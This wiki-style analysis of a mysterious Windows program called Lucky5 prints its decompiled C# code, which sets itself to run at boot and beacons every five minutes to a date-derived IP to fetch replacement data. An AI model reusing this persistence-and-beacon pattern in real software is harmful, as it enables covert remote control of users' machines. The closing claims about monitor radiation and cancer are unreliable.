Lucky5
From SentryOutpost
Lucky5 first came to the attention of Sentry Outpost when it was discovered by StuR of Ronomi.com. It has existed since at least May 13th [1].
[edit] What It Does
The Lucky5 program has two key parts. The Lucky5, and the Lucky5ip.
The Lucky5 program calculates how many 28-day cycles (somewhat similiar to the lunar calendar) it has been since October 31, 1999. This is hard-coded into the program. Once it calculates how long it has been (both in full 28-day cycles and how long it's been since the last 28-day cycle began), it uses that information to extract the five-character piece from the file. Note then that the Lucky5 changes daily.
The Lucky5ip program generates an IP address and a port in a separate algorithm using the Lucky5 for the day as well as the variables based on the number of days from October 31st, 1999 as mentioned above. This basically means that the Lucky5ip changes daily as well.
As previously explained that the program generates a key (The five-character long Lucky5, two of which were Xé:3a and ÇT1Óa) as well as two date-based numbers, the lunar_cycles and lunar_offset. It then uses the key and those numbers to generate a LuckyIP. This happens every five minutes, usually the IP doesn't belong to anyone or anything in specific. Sometimes, however, the IP belongs to a computer on the other end, acting as a server. In this case, the server or computer will be referred to as the server.
The server then (presumably) checks the key to make sure it's correct and then sends the key back to the client (The Lucky5 program itself). The client now knows that there's a server on the other end of the connection. Something different occurs after five minutes has elapsed. When the next five minutes elapses, Instead, the client sends the server an encoded version of a cryptic, half Arabic-half, English prayer. The client sends the server the encoded prayer. The server then recieves the prayer, checks it, and sends the client back an updated prayer. The client backs up the old prayer to lucky.bak and then saves the updated prayer to lucky.dat. This gives the Lucky program a new prayer to operate from/with.
Some of this has been found manually, without the use of a decompiler. When we found the open ports on both Sentry Outpost, and one of the Sentries: Kevin's computer, some Sentries connected and used the "password" (the key) to the initial connection. However, since they didn't know the prayer or how to encode it, they couldn't finish it off. Speculation exists that it outputs the original prayer after a bad connection just as a matter of course.
It is important to mention the End User Liscense Agreement (EULA). The EULA states that there are several side effects, some of the common general side effects include: headache, facial heat (flushing), and upset stomach. Blurred vision, bluish vision, and light sensitivity (photophobia). Among the less common side effects are: Abnormal thoughts and thinking, loss of inhibition, agressiveness, alcohol intoxication type effects, visual and auditory hallucinations, depersonalization. It states that some users described a need to gamble, increased sexual urges, lucid dreaming, behavioral changes, amnesia, depression, anxiety. However, it is most important to note that increased suicidal thoughts are mentioned in the "mainly pulled patients" as a byproduct of over exposure. The EULA cautions that the minimum possible dosage must be used.
[edit] C# Decompiler Code
private static void Main() {
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Lucky5Main());
}
public class Lucky5Main : Form
{
// Fields
private ToolStripMenuItem aboutlucky5ToolStripMenuItem;
private bool bBringLuck;
private Timer bringLuckTimer;
private Button button1;
private IContainer components;
private ContextMenuStrip contextMenuStrip;
private ToolStripMenuItem exitToolStripMenuItem;
private Label label4;
private DateTime lastRun;
private NotifyIcon notifyIcon;
public lucky5_class ourLuckyClass;
private string regRootKey = @"Software\Lucky5";
private ToolStripSeparator toolStripSeparator1;
// Methods
public Lucky5Main()
{
this.InitializeComponent();
this.ourLuckyClass = new lucky5_class();
RegistryKey key = Registry.CurrentUser.OpenSubKey(this.regRootKey, true);
if (key == null)
{
key = Registry.CurrentUser.CreateSubKey(this.regRootKey);
}
if (key.GetValue("FirstRun") == null)
{
base.WindowState = FormWindowState.Normal;
base.ShowInTaskbar = true;
base.StartPosition = FormStartPosition.CenterScreen;
key.SetValue("FirstRun", 1, RegistryValueKind.DWord);
}
else
{
base.WindowState = FormWindowState.Minimized;
base.ShowInTaskbar = false;
base.StartPosition = FormStartPosition.CenterScreen;
}
string text = (string) key.GetValue("lastRun", ".%21%.");
switch (text)
{
case ".%21%.":
case "":
this.lastRun = DateTime.Now;
key.SetValue("lastRun", this.lastRun.ToString(), RegistryValueKind.String);
this.bBringLuck = true;
break;
default:
{
DateTimeConverter converter = new DateTimeConverter();
this.lastRun = (DateTime) converter.ConvertFromString(text);
break;
}
}
key.Close();
this.checkStartOnBoot(true);
this.bringLuckTimer = new Timer();
this.bringLuckTimer.Elapsed += new ElapsedEventHandler(this.bringLuckTimer_Tick);
this.bringLuckTimer.Interval = 300000;
this.bringLuckTimer.Start();
this.doBringLuck();
}
private void aboutlucky5_Click(object sender, EventArgs e)
{
base.WindowState = FormWindowState.Normal;
base.ShowInTaskbar = true;
}
private void bringLuckTimer_Tick(object sender, EventArgs e)
{
this.checkLastRun();
if (this.bBringLuck)
{
this.doBringLuck();
}
}
private void button1_Click(object sender, EventArgs e)
{
base.WindowState = FormWindowState.Minimized;
base.ShowInTaskbar = false;
}
private bool checkLastRun()
{
if (DateTime.Now.Subtract(this.lastRun).Hours > 0x18)
{
this.bBringLuck = true;
}
return this.bBringLuck;
}
private void checkStartOnBoot(bool setAutostart)
{
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
if (!setAutostart)
{
if (key.GetValue("Lucky5") != null)
{
key.DeleteValue("Lucky5");
}
}
else if (key.GetValue("Lucky5") == null)
{
key.SetValue("Lucky5", Application.ExecutablePath.ToString(), RegistryValueKind.String);
}
key.Close();
}
protected override void Dispose(bool disposing)
{
if (disposing && (this.components != null))
{
this.components.Dispose();
}
base.Dispose(disposing);
}
private void doBringLuck()
{
this.bBringLuck = false;
this.ourLuckyClass.calcLucky5();
httpCheckLucky5 lucky = new httpCheckLucky5(this, this.ourLuckyClass, false);
new Thread(new ThreadStart(lucky.RunMe)).Start();
this.notifyIcon.ShowBalloonTip(20, "Lucky5", "Increasing your luck now", ToolTipIcon.None);
this.lastRun = DateTime.Now;
RegistryKey key = Registry.CurrentUser.OpenSubKey(this.regRootKey, true);
key.SetValue("lastRun", this.lastRun.ToString(), RegistryValueKind.String);
key.Close();
}
private void exit_Click(object sender, EventArgs e)
{
base.Close();
}
public void httpCheckLucky5Callback()
{
httpCheckLucky5 lucky = new httpCheckLucky5(this, this.ourLuckyClass, true);
new Thread(new ThreadStart(lucky.RunMe)).Start();
this.notifyIcon.ShowBalloonTip(20, "Lucky5", "Increasing your luck now", ToolTipIcon.Info);
}
private void InitializeComponent()
{
this.components = new Container();
ComponentResourceManager manager = new ComponentResourceManager(typeof(Lucky5Main));
this.label4 = new Label();
this.notifyIcon = new NotifyIcon(this.components);
this.contextMenuStrip = new ContextMenuStrip(this.components);
this.aboutlucky5ToolStripMenuItem = new ToolStripMenuItem();
this.toolStripSeparator1 = new ToolStripSeparator();
this.exitToolStripMenuItem = new ToolStripMenuItem();
this.button1 = new Button();
this.contextMenuStrip.SuspendLayout();
base.SuspendLayout();
this.label4.AutoSize = true;
this.label4.BackColor = Color.White;
this.label4.Location = new Point(0x15, 0xbd);
this.label4.Name = "label4";
this.label4.Size = new Size(140, 13);
this.label4.TabIndex = 4;
this.label4.Text = "Copyright \x00a9 2007 STROBE";
this.notifyIcon.ContextMenuStrip = this.contextMenuStrip;
this.notifyIcon.Icon = (Icon) manager.GetObject("notifyIcon.Icon");
this.notifyIcon.Text = "Lucky 5";
this.notifyIcon.Visible = true;
this.contextMenuStrip.Items.AddRange(new ToolStripItem[] { this.aboutlucky5ToolStripMenuItem, this.toolStripSeparator1, this.exitToolStripMenuItem });
this.contextMenuStrip.Name = "contextMenuStrip";
this.contextMenuStrip.ShowImageMargin = false;
this.contextMenuStrip.Size = new Size(0x81, 0x4c);
this.aboutlucky5ToolStripMenuItem.Name = "aboutlucky5ToolStripMenuItem";
this.aboutlucky5ToolStripMenuItem.Size = new Size(0x80, 0x16);
this.aboutlucky5ToolStripMenuItem.Text = "About Lucky 5";
this.aboutlucky5ToolStripMenuItem.Click += new EventHandler(this.aboutlucky5_Click);
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new Size(0x7d, 6);
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new Size(0x80, 0x16);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new EventHandler(this.exit_Click);
this.button1.Location = new Point(0xfc, 0xb8);
this.button1.Name = "button1";
this.button1.Size = new Size(0x4b, 0x17);
this.button1.TabIndex = 5;
this.button1.Text = "Close";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new EventHandler(this.button1_Click);
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
this.BackgroundImage = Resources.lucky5_3;
this.BackgroundImageLayout = ImageLayout.Stretch;
base.ClientSize = new Size(0x153, 0xdb);
base.ControlBox = false;
base.Controls.Add(this.button1);
base.Controls.Add(this.label4);
this.DoubleBuffered = true;
base.FormBorderStyle = FormBorderStyle.FixedDialog;
base.Icon = (Icon) manager.GetObject("$this.Icon");
base.Name = "Lucky5Main";
base.ShowInTaskbar = false;
base.StartPosition = FormStartPosition.CenterScreen;
this.Text = "About Lucky 5";
base.Load += new EventHandler(this.Lucky5Main_Load);
this.contextMenuStrip.ResumeLayout(false);
base.ResumeLayout(false);
base.PerformLayout();
}
private void Lucky5Main_Load(object sender, EventArgs e)
{
if (!this.ourLuckyClass.loadPrayer())
{
MessageBox.Show("Error loading Data. Closing application.", "Error Loading", MessageBoxButtons.OK, MessageBoxIcon.Hand);
base.Close();
}
}
// Nested Types
protected class httpCheckLucky5
{
// Fields
private Lucky5Main ClientForm;
private lucky5_class ClientLucky;
private bool doGetPrayer;
// Methods
public httpCheckLucky5(Lucky5Main ourForm, lucky5_class ourLucky, bool getPrayer)
{
this.ClientForm = ourForm;
this.ClientLucky = ourLucky;
this.doGetPrayer = getPrayer;
}
public void RunMe()
{
byte[] buffer;
WebClient client = new WebClient();
try
{
string address = "http://" + this.ClientLucky.getLucky5Ip() + ":" + this.ClientLucky.getLucky5Port() + "/";
if (this.doGetPrayer)
{
buffer = client.UploadData(address, this.ClientLucky.getEncodedPrayer());
}
else
{
buffer = client.UploadData(address, this.ClientLucky.getLucky5());
}
}
catch (WebException exception)
{
WebExceptionStatus status = exception.Status;
return;
}
if (this.doGetPrayer)
{
if (buffer.Length > 5)
{
this.ClientLucky.saveNewPrayer(buffer);
}
}
else if (buffer.Equals(this.ClientLucky.getLucky5()))
{
this.ClientForm.httpCheckLucky5Callback();
}
}
}
}
public class lucky5_class
{
// Fields
private byte[] lucky5 = new byte[5];
private string[] lucky5Ip = new string[5];
private int lunar_cycles;
private int lunar_offset;
private byte[] prayer;
private DateTime prayerDate = DateTime.Now;
private bool prayerLoaded;
private int prayerOffset;
// Methods
public bool backupPrayer()
{
if (!this.prayerLoaded)
{
return false;
}
try
{
BinaryWriter writer = new BinaryWriter(File.OpenWrite("lucky.bak"));
writer.Write(this.prayer, 0, this.prayer.Length);
writer.Close();
return true;
}
catch (Exception)
{
return false;
}
}
public void calcLucky5()
{
int index = 0;
if (!this.prayerLoaded)
{
this.loadPrayer();
}
this.calcLunarData();
if (this.lunar_offset == 1)
{
index = (index + this.lunar_cycles) + 2;
}
else
{
for (int i = 0; i < this.prayer.Length; i++)
{
if (this.prayer[i] == 0x20)
{
index++;
if (i
ndex == (this.lunar_offset - 1))
{
index = (i + 2) + this.lunar_cycles;
break;
}
}
}
}
this.prayerOffset = index;
this.lucky5[0] = this.prayer[index];
this.lucky5[1] = this.prayer[index + 1];
this.lucky5[2] = this.prayer[index + 2];
this.lucky5[3] = this.prayer[index + 3];
this.lucky5[4] = this.prayer[index + 4];
this.calcLuckyIP();
}
private void calcLuckyIP()
{
int num3 = this.getSummedValue(this.lunar_offset);
int num4 = this.getSummedValue(this.lunar_cycles);
for (int i = 0; i < 5; i++)
{
byte num2 = this.lucky5[i];
num2 = (byte) (num2 + ((byte) this.lunar_offset));
num2 = (byte) (num2 + ((byte) this.lunar_cycles));
if (num2 < 10)
{
this.lucky5Ip[i] = "00" + num2.ToString();
}
else if (num2 < 100)
{
this.lucky5Ip[i] = "0" + num2.ToString();
}
else
{
this.lucky5Ip[i] = num2.ToString();
}
if ((i == 4) && (num3 > (((float) num4) / 2f)))
{
this.lucky5Ip[4] = Convert.ToString((int) (num2 + 0x1388));
}
}
}
private void calcLunarData()
{
int num = this.getDateDifference(this.prayerDate);
this.lunar_offset = (num % 0x1c) + 1;
this.lunar_cycles = num / 0x1c;
}
public int getCycles()
{
return this.lunar_cycles;
}
private int getDateDifference(DateTime ourDate)
{
DateTime time = new DateTime(0x7cf, 10, 0x1f);
return ourDate.Subtract(time).Days;
}
public byte[] getEncodedPrayer()
{
byte[] buffer = new byte[this.prayer.Length];
for (int i = 0; i < this.prayer.Length; i++)
{
buffer[i] = this.lucky5[i];
buffer[i] = (byte) (buffer[i] + ((byte) this.lunar_offset));
buffer[i] = (byte) (buffer[i] + ((byte) this.lunar_cycles));
}
return buffer;
}
public byte[] getLucky5()
{
return this.lucky5;
}
public string getLucky5Ip()
{
return (this.lucky5Ip[0] + "." + this.lucky5Ip[1] + "." + this.lucky5Ip[2] + "." + this.lucky5Ip[3]);
}
public string getLucky5Port()
{
return this.lucky5Ip[4];
}
public int getOffset()
{
return this.lunar_offset;
}
public int getPrayerOffset()
{
return this.prayerOffset;
}
private int getSummedValue(int theNumber)
{
int num2 = 0;
string str = theNumber.ToString();
for (int i = 0; i < str.Length; i++)
{
num2 += Convert.ToInt16(str.Substring(i, 1));
}
return num2;
}
public bool loadPrayer()
{
try
{
BinaryReader reader = new BinaryReader(File.Open("lucky.dat", FileMode.Open));
this.prayer = new byte[reader.BaseStream.Length];
this.prayer = reader.ReadBytes((int) reader.BaseStream.Length);
reader.Close();
this.prayerLoaded = true;
}
catch (Exception)
{
this.prayerLoaded = false;
}
return this.prayerLoaded;
}
public bool saveNewPrayer(byte[] newPrayer)
{
if (!this.backupPrayer())
{
return false;
}
try
{
BinaryWriter writer = new BinaryWriter(File.OpenWrite("lucky.dat"));
writer.Write(newPrayer, 0, newPrayer.Length);
writer.Close();
}
catch (Exception)
{
return false;
}
return this.loadPrayer();
}
public void setDate(DateTime date)
{
this.prayerDate = date;
}
public void setDateFromString(string date)
{
DateTimeConverter converter = new DateTimeConverter();
this.prayerDate = (DateTime) converter.ConvertFromString(date);
}
}
[edit] Speculation
Much speculation exists about the Lucky5 program. One notable theory is that Lucky5 is a program designed to "chant", in order to complete a "summoning ritual", to produce a larger piece of malware, or an extremely powerful virus type program. This is supported by the Lucky5 programming itself. The program sends an encrypted prayer in hopes that another encrypted prayer will be on the other side. When the program recieves a prayer in return, an information exchange takes place, with one client sending it's own piece of the information, and another sending it's piece. The "prayers" are then sent to a main computer with the information, the information comes together forming code for a new program, thus establishing the symbolism between a summoning ritual and virus creation.
As to the side effects of the Lucky5 program, one should note that many of the side effects are indicitive of some cancers or environmentally caused neurological conditions, that is, outside influences affect the nervous system itself. Some of the side effects also line up for the physiological symptoms of prolonged stress or even fear. Speculation exists that the Lucky5 program has some bit of undetectable code that causes certain light patterns or higher levels of radiation from a computer monitor, physiologically effecting your state of being, and possibly causing cancer acute to radiation.
The Lucky5 malware is still a pending investigation by the Sentries, and it's true purpose is still mostly unknown, leaving only speculations.